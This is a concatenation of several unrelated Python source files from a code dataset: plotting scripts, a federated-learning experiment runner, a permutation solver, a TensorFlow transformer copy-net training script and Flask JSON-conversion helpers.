ax1.hist(p[:,0,i], bins=50, c='r', histtype='step')\n \n ax2.hist(p[:,1,i], bins=50, c='k',histtype='step',\\\n label=r'$Q$')\n ax2.hist(p[:,2,i], bins=50, c='b',histtype='step',\\\n label=r'$U$')\n else:\n for i in range(len(p[0,0,:])):\n ax1.plot(p[:,0,i], '-r')\n ax2.plot(p[:,1,i], '-k', label=r'$Q$')\n ax2.plot(p[:,2,i], '-b', label=r'$U$')\n #\n\n ax1.set_xlabel(xlab[0])\n ax1.set_ylabel(ylab)\n \n ax2.set_xlabel(xlab[1])\n ax2.set_ylabel(ylab)\n ax2.legend()\n \n \n else:\n print('Plot maximum likelihood parameters')\n f, ((a1,a2,a3),(a4,a5,a6)) = plt.subplots(3,2)\n \n a1.plot(p[0,:], '.r')\n a2.plot(p[1,:], '.k')\n a3.plot(p[2,:], '.b')\n\n#\n","sub_path":"Polarisation_module/pol_sampler_mod.py","file_name":"pol_sampler_mod.py","file_ext":"py","file_size_in_byte":14432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"163711363","text":"#penggunaan subplots\r\n#sedikit berbeda dengan subplot\r\nimport matplotlib.pyplot as p\r\nimport numpy as n\r\n\r\nx=n.arange(-5,6)\r\ny1=x\r\ny2=x**2\r\ny3=x**3\r\ny4=x**4\r\n\r\nfig, ax=p.subplots(nrows=2,ncols=2,figsize=(10,10))\r\nax[0,0].plot(x,y1,\"bo\")\r\nax[0,1].plot(x,y2,\"g^\")\r\nax[1,0].plot(x,y3,\"r-\")\r\nax[1,1].plot(x,y4,\".-\")\r\n\r\n#judul\r\nax[0,0].set_title(\"Kurva Linier\")\r\nax[0,1].set_title(\"Kurva Kuadratik\")\r\nax[1,0].set_title(\"Kurva polinom tiga\")\r\nax[1,1].set_title(\"Kurva Polinom Empat\")\r\n\r\np.suptitle(\"Latihan Kurva keempat\")\r\np.show()\r\n\r\n#Sumber: https://towardsdatascience.com/matplotlib-tutorial-learn-basics-of-pythons-powerful-plotting-library-b5d1b8f67596\r\n","sub_path":"python_script/grafik_subplots.py","file_name":"grafik_subplots.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"385856748","text":"import datetime\nfrom TINY_utils import TINY\nfrom paras.tiny import base\nfrom paras.tiny import cen_sing, cen_multi\nfrom paras.tiny import multi_cen_sing, multi_cen_multi\nfrom paras.tiny import diff_privacy_multi_001, diff_privacy_multi_002\nfrom paras.tiny import dis_multi, dis_sing\nfrom paras.tiny import foolsgold, geomedian\nfrom paras.tiny import double_pixel_multi, double_pixel_sing\nfrom paras.tiny import half_attack_multi, half_attack_sing\nfrom utils.csv_record import clear_all_record\n\nimport utils.utils\nimport logging\nimport argparse\n\nmode_list = [\"cen\", \"multi_cen\", \"diff\", \"dis\", \"double_pix\", \"defense\", \"half_attack\", \"all\"]\n\nlogger = logging.getLogger(\"main logger\")\nlogger.setLevel(logging.INFO)\nlogger.addHandler(logging.StreamHandler())\n\ndef run_test(parameters, current_time, folder_name):\n clear_all_record()\n helper = TINY(current_time, folder_name, parameters)\n helper.create_model()\n helper.load_data()\n utils.utils.train_process(helper)\n\ndef test_conf(base_para, choice_para, name):\n base_para.update(choice_para)\n current_time = datetime.datetime.now().strftime('%b.%d_%H.%M.%S')\n run_test(base_para, current_time, \"tiny_\" + name)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='mode')\n parser.add_argument('--params', dest='params')\n args = parser.parse_args()\n \n mode = args.params\n check_correctness = False\n\n if mode == \"cen\" or mode == \"all\":\n check_correctness = True\n logger.info(\"Testing Centralized Multi-Shot on Tiny\")\n test_conf(base.parameter_base, cen_multi.parameters, \"cen_multi\")\n\n logger.info(\"Testing Centralized Single-Shot on Tiny\")\n test_conf(base.parameter_base, cen_sing.parameters, \"cen_sing\")\n\n\n\n if mode == \"multi_cen\" or mode == \"all\":\n check_correctness = True\n logger.info(\"Testing Multi-Distributed Multi-Shot on Tiny\")\n test_conf(base.parameter_base, multi_cen_multi.parameters, \"multi_cen_multi\")\n\n\n logger.info(\"Testing Multi-Distributed Single-Shot on Tiny\")\n test_conf(base.parameter_base, multi_cen_sing.parameters, \"multi_cen_sing\")\n\n\n\n if mode == \"dis\" or mode == \"all\":\n check_correctness = True\n logger.info(\"Testing Distributed Multi-Shot on Tiny\")\n test_conf(base.parameter_base, dis_multi.parameters, \"dis_multi\")\n\n\n logger.info(\"Testing Distributed Single-Shot on Tiny\")\n test_conf(base.parameter_base, dis_sing.parameters, \"dis_sing\")\n\n\n\n if mode == \"diff\" or mode == \"all\":\n check_correctness = True\n logger.info(\"Testing Distributed Multi-Shot on Tiny\")\n test_conf(base.parameter_base, diff_privacy_multi_002.parameters, \"diff-002\")\n \n\n logger.info(\"Testing Diff-Privacy Single-Shot on Tiny\")\n test_conf(base.parameter_base, diff_privacy_multi_001.parameters, \"diff-001\")\n\n\n if mode == \"double_pix\" or mode == \"all\":\n check_correctness = True\n logger.info(\"Testing Double Pixel Multi-Shot on Tiny\")\n test_conf(base.parameter_base, double_pixel_multi.parameters, \"double_pix_multi\")\n \n logger.info(\"Testing Double Pixel Single-Shot on Tiny\")\n test_conf(base.parameter_base, double_pixel_sing.parameters, \"double_pix_sing\")\n\n\n if mode == \"defense\" or mode == \"all\":\n check_correctness = True\n logger.info(\"Testing Double Pixel Multi-Shot on Tiny\")\n test_conf(base.parameter_base, foolsgold.parameters, \"foolsgold\")\n\n logger.info(\"Testing GeoMedian Single-Shot on Tiny\")\n test_conf(base.parameter_base, geomedian.parameters, \"geomedian\")\n\n\n if mode == \"half_attack\" or mode == \"all\":\n check_correctness = True\n logger.info(\"Testing Half Attack Multi-Shot on Tiny\")\n test_conf(base.parameter_base, half_attack_multi.parameters, \"half_attack_multi\")\n\n\n logger.info(\"Testing Half Attack Single-Shot on Tiny\")\n test_conf(base.parameter_base, half_attack_sing.parameters, \"half_attack_sing\")\n\n\n if not check_correctness:\n print(\"Mode Error! Choose from these setting: \", mode_list)\n \n\n \n\n\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"TINY.py","file_name":"TINY.py","file_ext":"py","file_size_in_byte":4136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"177821823","text":"class Solution(object):\n def getPermutation(self, n, k):\n \"\"\"\n :type n: int\n :type k: int\n :rtype: str\n \"\"\"\n # use iteration\n fact = math.factorial(n)\n if k > fact: return \"\"\n k -=1 # count from 0 in this program\n res = []\n nums = [ str(x) for x in range(1,n+1)] # can\n while len(nums) > 1:\n fact = fact/n\n q,r = divmod(k,fact)\n res.append(nums[q])\n nums = nums[:q] + nums[q+1:]\n k = r\n n-=1\n res.append(nums[0])\n return ''.join(res)\n \n \n ","sub_path":"get_permutation/iteration.py","file_name":"iteration.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"407297914","text":"#!/usr/bin/env python3\n\"\"\"\nText Content Manipulation\n3-gated copy net.\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\n# pylint: disable=invalid-name, no-member, too-many-locals\n\nimport importlib\nimport os\nimport numpy as np\nimport tensorflow as tf\nimport texar as tx\nprint('path is {}'.format(tx.__path__))\nimport pickle\nfrom texar.core import get_train_op\nfrom utils_e2e_clean import *\n# from ie import get_precrec\nfrom texar.modules import TransformerEncoder, TransformerDecoder, TransformerCopyDecoder\nfrom texar.utils import transformer_utils\n\n\nflags = tf.flags\nflags.DEFINE_string(\"data_type\", \"e2e\", \"Dataset to evaluate: nba or e2e\")\nflags.DEFINE_string(\"config_data\", \"config_data_e2e_clean\", \"The data config.\")\nflags.DEFINE_string(\"config_model\", \"config_model_transformer\", \"The model config.\")\nflags.DEFINE_string(\"config_train\", \"config_train\", \"The training config.\")\nflags.DEFINE_float(\"rec_w\", 0.8, \"Weight of reconstruction loss.\")\nflags.DEFINE_float(\"rec_w_rate\", 0., \"Increasing rate of rec_w.\")\nflags.DEFINE_boolean(\"add_bleu_weight\", False, \"Whether to multiply BLEU weight\"\n \" onto the first loss.\")\nflags.DEFINE_string(\"expr_name\", \"e2e_dis_less3_output\", \"The experiment name. \"\n \"Used as the directory name of run.\")\nflags.DEFINE_string(\"restore_from\", \"\", \"The specific checkpoint path to \"\n \"restore from. If not specified, the latest checkpoint in \"\n \"expr_name is used.\")\nflags.DEFINE_boolean(\"copy_x\", False, \"Whether to copy from x.\")\nflags.DEFINE_boolean(\"copy_y_\", False, \"Whether to copy from y'.\")\nflags.DEFINE_boolean(\"coverage\", False, \"Whether to add coverage onto the copynets.\")\nflags.DEFINE_float(\"exact_cover_w\", 0., \"Weight of exact coverage loss.\")\nflags.DEFINE_float(\"eps\", 1e-10, \"epsilon used to avoid log(0).\")\nflags.DEFINE_integer(\"disabled_vocab_size\", 0, \"Disabled vocab size.\")\nflags.DEFINE_boolean(\"attn_x\", False, \"Whether to attend x.\")\nflags.DEFINE_boolean(\"attn_y_\", False, \"Whether to attend y'.\")\nflags.DEFINE_boolean(\"x_path\", False, \"Whether to add structured data path.\")\nflags.DEFINE_float(\"x_path_multiplicator\", 1., \"Structured data path multiplicator.\")\nflags.DEFINE_float(\"x_path_addend\", 0., \"Structured data path addend.\")\nflags.DEFINE_boolean(\"align\", False, \"Whether it is to get alignment.\")\nflags.DEFINE_boolean(\"output_align\", False, \"Whether to output alignment.\")\nflags.DEFINE_boolean(\"verbose\", False, \"verbose.\")\nflags.DEFINE_boolean(\"eval_ie\", False, \"Whether evaluate IE.\")\nflags.DEFINE_integer(\"eval_ie_gpuid\", 3, \"ID of GPU on which IE runs.\")\nFLAGS = flags.FLAGS\n\ncopy_flag = FLAGS.copy_x or FLAGS.copy_y_\nattn_flag = FLAGS.attn_x or FLAGS.attn_y_\n\nif FLAGS.output_align:\n FLAGS.align = True\n\nconfig_data = importlib.import_module(FLAGS.config_data)\nconfig_model = importlib.import_module(FLAGS.config_model)\nconfig_train = importlib.import_module(FLAGS.config_train)\nexpr_name = FLAGS.expr_name\nrestore_from = FLAGS.restore_from\n\ndir_summary = os.path.join(expr_name, 'log')\ndir_model = os.path.join(expr_name, 'ckpt')\ndir_best = os.path.join(expr_name, 'ckpt-best')\nckpt_model = os.path.join(dir_model, 'model.ckpt')\nckpt_best = os.path.join(dir_best, 'model.ckpt')\n\n\ndef get_optimistic_restore_variables(ckpt_path, graph=tf.get_default_graph()):\n reader = tf.train.NewCheckpointReader(ckpt_path)\n saved_shapes = reader.get_variable_to_shape_map()\n var_names = sorted([\n (var.name, var.name.split(':')[0]) for var in tf.global_variables()\n if var.name.split(':')[0] in saved_shapes])\n restore_vars = []\n for var_name, saved_var_name in var_names:\n var = graph.get_tensor_by_name(var_name)\n var_shape = var.get_shape().as_list()\n if var_shape == saved_shapes[saved_var_name]:\n restore_vars.append(var)\n return restore_vars\n\n\ndef get_optimistic_saver(ckpt_path, graph=tf.get_default_graph()):\n return tf.train.Saver(\n get_optimistic_restore_variables(ckpt_path, graph=graph))\n\n\ndef build_model(data_batch, data, step):\n batch_size, num_steps = [\n tf.shape(data_batch[\"x_value_text_ids\"])[d] for d in range(2)]\n vocab = data.vocab('y_aux')\n\n id2str = '<{}>'.format\n bos_str, eos_str = map(id2str, (vocab.bos_token_id, vocab.eos_token_id))\n\n def single_bleu(ref, hypo):\n ref = [id2str(u if u != vocab.unk_token_id else -1) for u in ref]\n hypo = [id2str(u) for u in hypo]\n\n ref = tx.utils.strip_special_tokens(\n ' '.join(ref), strip_bos=bos_str, strip_eos=eos_str)\n hypo = tx.utils.strip_special_tokens(\n ' '.join(hypo), strip_eos=eos_str)\n\n return 0.01 * tx.evals.sentence_bleu(references=[ref], hypothesis=hypo)\n\n\n\n # losses\n losses = {}\n\n # embedders\n embedders = {\n name: tx.modules.WordEmbedder(\n vocab_size=data.vocab(name).size, hparams=hparams)\n for name, hparams in config_model.embedders.items()}\n\n # encoders\n y_encoder = tx.modules.TransformerEncoder(\n hparams=config_model.y_encoder)\n x_encoder = tx.modules.TransformerEncoder(\n hparams=config_model.x_encoder)\n\n\n def concat_encoder_outputs(outputs):\n return tf.concat(outputs, -1)\n\n\n def encode(ref_flag):\n y_str = y_strs[ref_flag]\n y_ids = data_batch['{}_text_ids'.format(y_str)]\n y_embeds = embedders['y_aux'](y_ids)\n y_sequence_length = data_batch['{}_length'.format(y_str)]\n y_enc_outputs = y_encoder(\n y_embeds, sequence_length=y_sequence_length)\n y_enc_outputs = concat_encoder_outputs(y_enc_outputs)\n\n x_str = x_strs[ref_flag]\n x_ids = {\n field: data_batch['{}_{}_text_ids'.format(x_str, field)][:, 1:-1]\n for field in x_fields}\n x_embeds = tf.concat(\n [embedders['x_{}'.format(field)](x_ids[field]) for field in x_fields],\n axis=-1)\n\n x_sequence_length = data_batch[\n '{}_{}_length'.format(x_str, x_fields[0])] - 2\n x_enc_outputs = x_encoder(\n x_embeds, sequence_length=x_sequence_length)\n x_enc_outputs = concat_encoder_outputs(x_enc_outputs)\n\n return y_ids, y_embeds, y_enc_outputs, y_sequence_length, \\\n x_ids, x_embeds, x_enc_outputs, x_sequence_length\n\n\n encode_results = [encode(ref_flag) for ref_flag in range(2)]\n y_ids, y_embeds, y_enc_outputs, y_sequence_length, \\\n x_ids, x_embeds, x_enc_outputs, x_sequence_length = \\\n zip(*encode_results)\n\n # get rnn cell\n # rnn_cell = tx.core.layers.get_rnn_cell(config_model.rnn_cell)\n\n\n def get_decoder( y__ref_flag, x_ref_flag, tgt_ref_flag,\n beam_width=None):\n output_layer_params = \\\n {'output_layer': tf.identity} if copy_flag else {'vocab_size': vocab.size}\n\n\n if attn_flag: # attention\n memory = tf.concat(\n [y_enc_outputs[y__ref_flag],\n x_enc_outputs[x_ref_flag]],\n axis=1)\n memory_sequence_length = None\n copy_memory_sequence_length = None\n\n tgt_embedding = tf.concat(\n [tf.zeros(shape=[1, embedders['y_aux'].dim]), embedders['y_aux'].embedding[1:, :]], axis=0)\n decoder = tx.modules.TransformerCopyDecoder(\n embedding=tgt_embedding,\n hparams=config_model.decoder)\n\n return decoder\n\n def get_decoder_and_outputs(\n y__ref_flag, x_ref_flag, tgt_ref_flag, params,\n beam_width=None):\n decoder = get_decoder(\n y__ref_flag, x_ref_flag, tgt_ref_flag,\n beam_width=beam_width)\n if beam_width is None:\n ret = decoder(**params)\n else:\n ret = decoder(\n beam_width=beam_width,\n **params)\n return decoder, ret\n\n get_decoder_and_outputs = tf.make_template(\n 'get_decoder_and_outputs', get_decoder_and_outputs)\n\n gamma = tf.Variable(1, dtype=tf.float32, trainable=True)\n gamma = tf.exp(tf.log(gamma))\n\n def teacher_forcing(y__ref_flag, x_ref_flag, loss_name):\n tgt_flag = x_ref_flag\n tgt_str = y_strs[tgt_flag]\n memory_sequence_length = tf.add(y_sequence_length[y__ref_flag] - 1, x_sequence_length[x_ref_flag])\n sequence_length = data_batch['{}_length'.format(tgt_str)] - 1\n\n memory = tf.concat(\n [y_enc_outputs[y__ref_flag],\n x_enc_outputs[x_ref_flag]],\n axis=1) # [64 61 384]\n\n decoder, rets = get_decoder_and_outputs(\n y__ref_flag, x_ref_flag, tgt_flag,\n {\n 'memory': memory, #print_mem,\n 'memory_sequence_length': memory_sequence_length,\n 'copy_memory': x_enc_outputs[x_ref_flag],\n 'copy_memory_sequence_length': x_sequence_length[x_ref_flag],\n 'source_ids': x_ids[x_ref_flag]['value'], #print_ids, # source_ids\n 'gamma': gamma,\n 'decoding_strategy': 'train_greedy',\n 'inputs': y_embeds[tgt_flag][:, :-1, :], #[:, 1:, :], #target yence embeds (ignore )\n 'alpha': config_model.alpha,\n 'sequence_length': sequence_length,\n 'mode': tf.estimator.ModeKeys.TRAIN})\n\n tgt_y_ids = data_batch['{}_text_ids'.format(tgt_str)][:, 1:] # ground_truth ids (ignore )\n tf_outputs = rets[0]\n gens = rets[2]\n loss = tx.losses.sequence_sparse_softmax_cross_entropy(\n labels=tgt_y_ids,\n logits=tf_outputs.logits,\n sequence_length=data_batch['{}_length'.format(tgt_str)] - 1)\n # average_across_timesteps=True,\n # sum_over_timesteps=False)\n # loss = tf.reduce_mean(loss, 0)\n\n if copy_flag and FLAGS.exact_cover_w != 0:\n # sum_copy_probs = list(map(lambda t: tf.cast(t, tf.float32), final_state.sum_copy_probs))\n copy_probs = (1 - gens) * rets[1]\n sum_copy_probs = tf.reduce_sum(copy_probs, 1)\n # sum_copy_probs = tf.split(sum_copy_probs, tf.shape(sum_copy_probs)[0], axis=0)#list(map(lambda prob: tf.cast(prob, tf.float32), tuple(tf.reduce_sum(copy_probs, 1)))) #[batch_size, len_key]\n memory_lengths = x_sequence_length[x_ref_flag]#[len for len in sd_sequence_length[x_ref_flag]]\n exact_coverage_loss = \\\n tf.reduce_mean(tf.reduce_sum(\n tx.utils.mask_sequences(\n tf.square(sum_copy_probs - 1.), memory_lengths),\n 1))\n print_xe_loss_op = tf.print(loss_name, 'xe loss:', loss)\n with tf.control_dependencies([print_xe_loss_op]):\n print_op = tf.print(loss_name, 'exact coverage loss :', exact_coverage_loss)\n with tf.control_dependencies([print_op]):\n loss += FLAGS.exact_cover_w * exact_coverage_loss\n losses[loss_name] = loss\n\n return decoder, rets, loss, tgt_y_ids\n\n\n def beam_searching(y__ref_flag, x_ref_flag, beam_width):\n start_tokens = tf.ones_like(data_batch['y_aux_length']) * \\\n vocab.bos_token_id\n end_token = vocab.eos_token_id\n memory_sequence_length = tf.add(y_sequence_length[y__ref_flag] - 1, x_sequence_length[x_ref_flag])\n sequence_length = data_batch['{}_length'.format(y_strs[y__ref_flag])] - 1\n\n memory = tf.concat(\n [y_enc_outputs[y__ref_flag],\n x_enc_outputs[x_ref_flag]],\n axis=1)\n source_ids = tf.concat(\n [y_ids[y__ref_flag],\n x_ids[x_ref_flag]['value']], axis=1)\n\n #decoder, (bs_outputs, seq_len)\n decoder, bs_outputs = get_decoder_and_outputs(\n y__ref_flag, x_ref_flag, None,\n {\n 'memory': memory, #print_mem,\n 'memory_sequence_length': memory_sequence_length,\n 'copy_memory': x_enc_outputs[x_ref_flag],\n 'copy_memory_sequence_length': x_sequence_length[x_ref_flag],\n 'gamma':gamma,\n 'source_ids': x_ids[x_ref_flag]['value'],# source_ids,#x_ids[x_ref_flag]['entry'], #[ batch_size, source_length]\n # 'decoding_strategy': 'infer_sample', only for random sampling\n 'alpha': config_model.alpha,\n 'start_tokens': start_tokens,\n 'end_token': end_token,\n 'max_decoding_length': config_train.infer_max_decoding_length},\n beam_width=beam_width)\n\n return decoder, bs_outputs, sequence_length, start_tokens\n\n\n\n decoder, rets, loss, tgt_y_ids = teacher_forcing(1, 0, 'MLE')\n rec_decoder, _, rec_loss, _ = teacher_forcing(1, 1, 'REC')\n rec_weight = FLAGS.rec_w + FLAGS.rec_w_rate * tf.cast(step, tf.float32)\n step_stage = tf.cast(step, tf.float32) / tf.constant(600.0)\n rec_weight = tf.case([(tf.less_equal(step_stage, tf.constant(1.0)), lambda: tf.constant(1.0)), \\\n (tf.greater(step_stage, tf.constant(2.0)), lambda: FLAGS.rec_w)], \\\n default=lambda: tf.constant(1.0) - (step_stage - 1) * (1 - FLAGS.rec_w))\n joint_loss = (1 - rec_weight) * loss + rec_weight * rec_loss\n losses['joint'] = joint_loss\n\n tiled_decoder, bs_outputs, sequence_length, start_tokens = beam_searching(\n 1, 0, config_train.infer_beam_width)\n\n train_ops = {\n name: get_train_op(losses[name], hparams=config_train.train[name])\n for name in config_train.train}\n\n return train_ops, bs_outputs, rets, sequence_length, tgt_y_ids, start_tokens, gamma\n\n\ndef main():\n # data batch\n datasets = {mode: tx.data.MultiAlignedData(hparams)\n for mode, hparams in config_data.datas.items()}\n data_iterator = tx.data.FeedableDataIterator(datasets)\n data_batch = data_iterator.get_next()\n\n global_step = tf.train.get_or_create_global_step()\n\n train_ops, bs_outputs, rets, sequence_length, tgt_y_ids, start_tokens, gamma = build_model(data_batch, datasets['train'], global_step)\n\n mle_outputs = rets[0]\n attn_probs = rets[1]\n copy_probs = rets[1] * (1 - rets[2])\n gens = rets[2]\n # source_text = rets[3]\n preds = tf.to_int32(tf.argmax(mle_outputs.logits, axis=-1))\n\n summary_ops = {\n name: tf.summary.merge(\n tf.get_collection(\n tf.GraphKeys.SUMMARIES,\n scope=get_scope_name_of_train_op(name)),\n name=get_scope_name_of_summary_op(name))\n for name in train_ops.keys()}\n\n saver = tf.train.Saver(max_to_keep=None)\n\n global best_ever_val_bleu\n best_ever_val_bleu = 0.\n\n\n def _save_to(directory, step):\n print('saving to {} ...'.format(directory))\n\n saved_path = saver.save(sess, directory, global_step=step)\n\n print('saved to {}'.format(saved_path))\n\n\n def _restore_from_path(ckpt_path):\n print('restoring from {} ...'.format(ckpt_path))\n\n try:\n saver.restore(sess, ckpt_path)\n except tf.errors.NotFoundError:\n print('Some variables are missing. Try optimistically restoring.')\n (get_optimistic_saver(ckpt_path)).restore(sess, ckpt_path)\n\n print('done.')\n\n\n def _restore_from(directory):\n if os.path.exists(directory):\n ckpt_path = tf.train.latest_checkpoint(directory)\n _restore_from_path(ckpt_path)\n\n else:\n print('cannot find checkpoint directory {}'.format(directory))\n\n\n\n def _train_epoch(sess, summary_writer, mode, train_op, summary_op, mle_outputs):\n print('in _train_epoch')\n\n data_iterator.restart_dataset(sess, mode)\n feed_dict = {\n tx.global_mode(): tf.estimator.ModeKeys.TRAIN,\n data_iterator.handle: data_iterator.get_handle(sess, mode),\n }\n\n cnt = 0\n\n while True:\n try:\n loss, summary, tf_outputs, ground_truth, _gamma = \\\n sess.run((train_op, summary_op, mle_outputs, tgt_y_ids, gamma), feed_dict)\n\n step = tf.train.global_step(sess, global_step)\n\n print('step {:d}: loss = {:.6f} gamma = {:.4f}'.format(step, loss, _gamma))\n\n summary_writer.add_summary(summary, step)\n\n\n # if step % config_train.steps_per_eval == 0:\n # _eval_epoch(sess, summary_writer, 'val')\n # # _eval_epoch(sess, summary_writer, 'test')\n\n # if step > 921 and (step % 100 == 0):\n # _eval_epoch(sess, summary_writer, 'val')\n\n\n except tf.errors.OutOfRangeError:\n break\n\n print('end _train_epoch')\n\n\n def _eval_epoch(sess, summary_writer, mode):\n global best_ever_val_bleu\n\n print('in _eval_epoch with mode {}'.format(mode))\n\n data_iterator.restart_dataset(sess, mode)\n feed_dict = {\n tx.global_mode(): tf.estimator.ModeKeys.EVAL,\n data_iterator.handle: data_iterator.get_handle(sess, mode)\n }\n\n step = tf.train.global_step(sess, global_step)\n\n ref_hypo_pairs = []\n fetches = [\n [data_batch['y_aux_text'], data_batch['y_ref_text']],\n bs_outputs['sample_id'],#[:, :, 0],\n #bs_outputs.sample_id,\n sequence_length,\n tgt_y_ids,\n start_tokens,\n ]\n\n if not os.path.exists(dir_model):\n os.makedirs(dir_model)\n\n hypo_file_name = os.path.join(\n dir_model, \"hypos.step{}.{}.txt\".format(step, mode))\n hypo_file = open(hypo_file_name, \"w\")\n\n cnt = 0\n while True:\n try:\n target_texts, bs_ids, seq_length, ground_truth, _start_tokens = sess.run(fetches, feed_dict)\n target_texts = [\n tx.utils.strip_special_tokens(\n texts[:, 1:].tolist(), is_token_list=True)\n for texts in target_texts]\n output_ids = bs_ids[:, :, 0]\n output_texts = tx.utils.map_ids_to_strs(\n ids=output_ids.tolist(), vocab=datasets[mode].vocab('y_aux'),\n join=False)\n\n target_texts = list(zip(*target_texts))\n\n for ref, hypo in zip(target_texts, output_texts):\n if cnt < 10:\n print('cnt = {}'.format(cnt))\n for i, s in enumerate(ref):\n print('ref{}: {}'.format(i, ' '.join(s)))\n print('hypo: {}'.format(' '.join(hypo)))\n print(' '.join(hypo), file=hypo_file)\n cnt += 1\n print('processed {} samples'.format(cnt))\n\n ref_hypo_pairs.extend(zip(target_texts, output_texts))\n\n except tf.errors.OutOfRangeError:\n break\n\n hypo_file.close()\n\n\n refs, hypos = zip(*ref_hypo_pairs)\n bleus = []\n get_bleu_name = '{}_BLEU'.format\n print('In {} mode:'.format(mode))\n for i in range(0, 2):\n refs_ = list(map(lambda ref: ref[i:i+1], refs))\n bleu = corpus_bleu(refs_, hypos)\n print('{}: {:.2f}'.format(get_bleu_name(i), bleu))\n bleus.append(bleu)\n\n summary = tf.Summary()\n for i, bleu in enumerate(bleus):\n summary.value.add(\n tag='{}/{}'.format(mode, get_bleu_name(i)), simple_value=bleu)\n if FLAGS.eval_ie and mode == 'test':\n for name, value in {'precision': prec, 'recall': rec}.items():\n summary.value.add(tag='{}/{}'.format(mode, name),\n simple_value=value)\n summary_writer.add_summary(summary, step)\n summary_writer.flush()\n\n bleu = bleus[0]\n if mode == 'val':\n if bleu > best_ever_val_bleu:\n best_ever_val_bleu = bleu\n print('updated best val bleu: {}'.format(bleu))\n\n _save_to(ckpt_best, step)\n\n print('end _eval_epoch')\n return bleu\n\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n sess.run(tf.local_variables_initializer())\n sess.run(tf.tables_initializer())\n\n if restore_from:\n _restore_from_path(restore_from)\n else:\n _restore_from(dir_model)\n\n\n summary_writer = tf.summary.FileWriter(\n dir_summary, sess.graph, flush_secs=30)\n\n epoch = 0\n while epoch < config_train.max_epochs:\n name = 'align' if FLAGS.align else 'joint'\n train_op = train_ops[name]\n summary_op = summary_ops[name]\n\n val_bleu = _eval_epoch(sess, summary_writer, 'val')\n step = tf.train.global_step(sess, global_step)\n\n print('epoch: {} ({}), step: {}, '\n 'val BLEU: {:.2f}'.format(\n epoch, name, step, val_bleu))\n\n _train_epoch(sess, summary_writer, 'train', train_op, summary_op, mle_outputs)\n\n epoch += 1\n\n step = tf.train.global_step(sess, global_step)\n _save_to(ckpt_model, step)\n\n test_bleu = _eval_epoch(sess, summary_writer, 'test')\n print('epoch: {}, test BLEU: {}'.format(epoch, test_bleu))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"manip_e2e_transformer.py","file_name":"manip_e2e_transformer.py","file_ext":"py","file_size_in_byte":21324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"371217634","text":"#!/usr/bin/python\n\"\"\" backend --> converter file \"\"\"\nimport os\nimport sys\nsys.path.append(os.path.dirname(__file__))\nfrom flask import current_app\n\nfrom YON.be_surveys import be_getSurveyData\n\n\n\"\"\"========================================================================\n*** Function: be_convertJsonChat_toArr\n*** server: back end\n*** Description: convert json of chat in group to array of msges\n*** Arguments: jsonChat\n*** Return: array of messeges\n=========================================================================\"\"\"\ndef be_convertJsonChat_toArr(json_chat=None):\n \"\"\" return array of the chat msgs \"\"\"\n msgs_arr = []\n if json_chat:\n if 'last' in json_chat:\n json_chat.pop('last')\n msgs_ids = list(json_chat.keys())\n\n for msg_id in msgs_ids:\n msg = json_chat[msg_id]\n msg['sender_id'] = str(msg['sender_id'])\n msgs_arr.append(msg)\n return msgs_arr\n\n\n\"\"\"========================================================================\n*** Function: be_convertJsonMembers_toArr \n*** server: back end\n*** Description: convert json of members/admin in group to array of members\n*** Arguments: jsonMembers\n*** Return: array of members/admins\n=========================================================================\"\"\"\ndef be_convertJsonMembers_toArr(json_members=None, user_contacts=None):\n \"\"\" return array of members for group \"\"\"\n current_app.logger.debug('be_convertJsonMembers_toArr, json_members {0}'.format(json_members))\n members_arr = []\n if json_members:\n members_ids = json_members.keys()\n for member_id in members_ids:\n members_arr.append(member_id)\n\n return members_arr\n\n\"\"\"========================================================================\n*** Function: be_convertJsonLists_toArr\n*** server: back end\n*** Description: get survey list as array of lists\n*** Arguments: jsonLists\n*** Return: array of lists\n=========================================================================\"\"\"\ndef be_convertJsonLists_toArr(jsonLists=None):\n \"\"\" return array of lists fo survey \"\"\"\n lists_arr = []\n if 'last' in jsonLists:\n jsonLists.pop('last')\n lists_ids = jsonLists.keys()\n for list_id in lists_ids:\n current_list = jsonLists[list_id]\n current_list['id'] = str(list_id)\n list_items_arr = []\n if 'items' in jsonLists[list_id]:\n list_items_arr = be_convertJsonItems_toArr(jsonLists[list_id]['items'])\n current_list['items'] = list_items_arr\n\n lists_arr.append(current_list)\n return lists_arr\n\n\n\"\"\"========================================================================\n*** Function: be_convertJsonItems_toArr\n*** server: back end\n*** Description: get list items as array of items\n*** Arguments: jsonItems\n*** Return: array of items\n=========================================================================\"\"\"\ndef be_convertJsonItems_toArr(json_items=None):\n \"\"\" return array of items for list id \"\"\"\n items_arr = []\n if json_items:\n if 'last' in json_items:\n json_items.pop('last')\n items_ids = list(json_items.keys())\n for item_id in items_ids:\n item = json_items[item_id]\n item['id'] = str(item_id)\n\n #Fetch Items\n item_owners = []\n if 'owners' in item and item['owners'] is not None:\n item_owners = be_convertJsonOwners_toArr(item['owners'])\n item['owners'] = item_owners\n\n items_arr.append(item)\n return items_arr\n\n\"\"\"========================================================================\n*** Function: be_convertJsonOwners_toArr\n*** server: back end\n*** Description: fet owners of item as array of owners\n*** Arguments: jsonOwners\n*** Return: array of owners\n=========================================================================\"\"\"\ndef be_convertJsonOwners_toArr(json_owners=None):\n \"\"\" return list of selections for item in list \"\"\"\n owners = []\n if json_owners:\n answers_ids = json_owners.keys()\n for user_id in answers_ids:\n user = {'id': user_id}\n owners.append(user)\n return owners\n\n\n\"\"\"========================================================================\n*** Function: be_convertJsonQuestions_toArr\n*** server: back end\n*** Description: convert the json question to array of questions\n*** Arguments: jsonQuestion\n*** Return: array of questions\n=========================================================================\"\"\"\ndef be_convertJsonQuestions_toArr(jsonQuestions=None):\n \"\"\" be_convertJsonQuestions_toArr \"\"\"\n 